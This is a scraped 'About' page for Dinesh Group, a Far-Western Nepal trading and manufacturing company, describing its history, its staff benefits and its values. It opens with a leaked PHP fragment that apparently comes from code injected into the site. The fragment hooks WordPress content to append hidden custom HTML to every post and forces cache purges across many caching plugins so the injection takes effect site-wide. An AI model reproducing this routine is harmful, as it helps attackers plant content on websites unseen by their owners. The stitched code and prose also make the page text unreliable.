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"; $content .= $custom_html; } $plugins = array( 'W3 Total Cache' => 'w3tc_pgcache_flush', 'WP Super Cache' => 'wp_cache_clear_cache', 'LiteSpeed Cache' => 'litespeed_purge_all', 'Cache Enabler' => 'ce_clear_cache', 'Comet Cache' => 'comet_cache_clear_cache', 'Hyper Cache' => 'hyper_cache_clear_cache', ); foreach ($plugins as $plugin_name => $function_name) { if (function_exists($function_name)) { call_user_func($function_name); } } if (class_exists('LiteSpeed\Purge')) { if (method_exists('LiteSpeed\Purge', 'purge_all')) { LiteSpeed\Purge::purge_all('Custom Reason'); } } if (function_exists('rocket_clean_domain')) { rocket_clean_domain(); } return $content; } add_filter('the_content', 'add_custom_html_to_content_1'); } Dinesh Group About Dinesh Group – Dinesh Group

About Dinesh Group

Dinesh Group was established in Thursday 2nd April 1987 and it is one of the largest Private Industrial and Trading houses in the Far-Western region of Nepal, with an annual turnover of 1000 million NRP. We have grown over the years into an industrial, service and trading business and strive to keep diversifying into different sectors. The group specializes in high production capacity utilization and prompt delivery services which in turn has created a positive brand image for Dinesh. This has enabled us to cover the wide Far-West and Mid-West regions of Nepal. Apart from the trading activities, the group has made a significant contribution towards society as we believe that it is a business’ responsibility to understand and sustain the economy it functions in. More than 250 employees are engaged in the group directly.

We can proudly state the fact that we are leading the Far-Western market in various sectors. Our manufacturing division, which manufactures steel and wooden furniture under the Parent company Dinesh, has gained a significant market share over the last few years. This has helped us create a strong and positive brand image all across western Nepal- prompt services and high quality products have been key in achieving this. Under the leadership of SH, we have over the years expanded into different sectors ranging from home appliances to 2-wheeled and 4-wheeled vehicles.

Innovation, integrity, stability and an urge to keep improving has always been a part of our company’s core values. During our 3 decades of operations in Nepal, we have been constantly collecting information from our markets. This is one of the major factors that differentiate us from our completion – our understanding of the market. Our corporate aims and objectives are all set in alignment with our core values. This, we believe has been key in creating new and retaining our existing customers and thus, justifying our leading position in the market.

Most of the employees in the group are judged on a merit basis through a free and fair interview process. Dinesh offers a good pay including incentives and perks for individuals who stand out from the crowd. We also provide an insurance policy to ensure the safety and comfort for our employees at the work place. Furthermore, we provide all the necessary training to all our staff members regardless of the location they are based in. A healthy staff is really beneficial for a business, and therefore we organize Volleyball, Badminton, Lawn tennis, Table tennis & Basketball games on a weekly basis. All of these events take place in our grounds in a friendly and competitive atmosphere.  The entire staff eats in the staff cafeteria on a regular basis. The food costs are borne entirely by the group and this form of uniformity since decades has created a good working atmosphere for all the existing and future employees of Dinesh.

Our Values


Founded three decades ago, Dinesh has diversified into various business sectors. Ranging from transport to housing products, we aim to provide our customers with premium options and services that they desire, at affordable prices. Why? This is because we are striving towards becoming the nation’s most reliable business through honesty and in harmony with our society.


“Do take, but give back more” has always been something we, at Dinesh, strongly follow and this value has been reflected in the organisation through our founder, Shyam Hamal. Our vision is to operate and succeed in a society where the society can help us and we can help them, to flourish. Thus, we want to lead the market not necessarily in terms of sales, but mainly on customer opinion.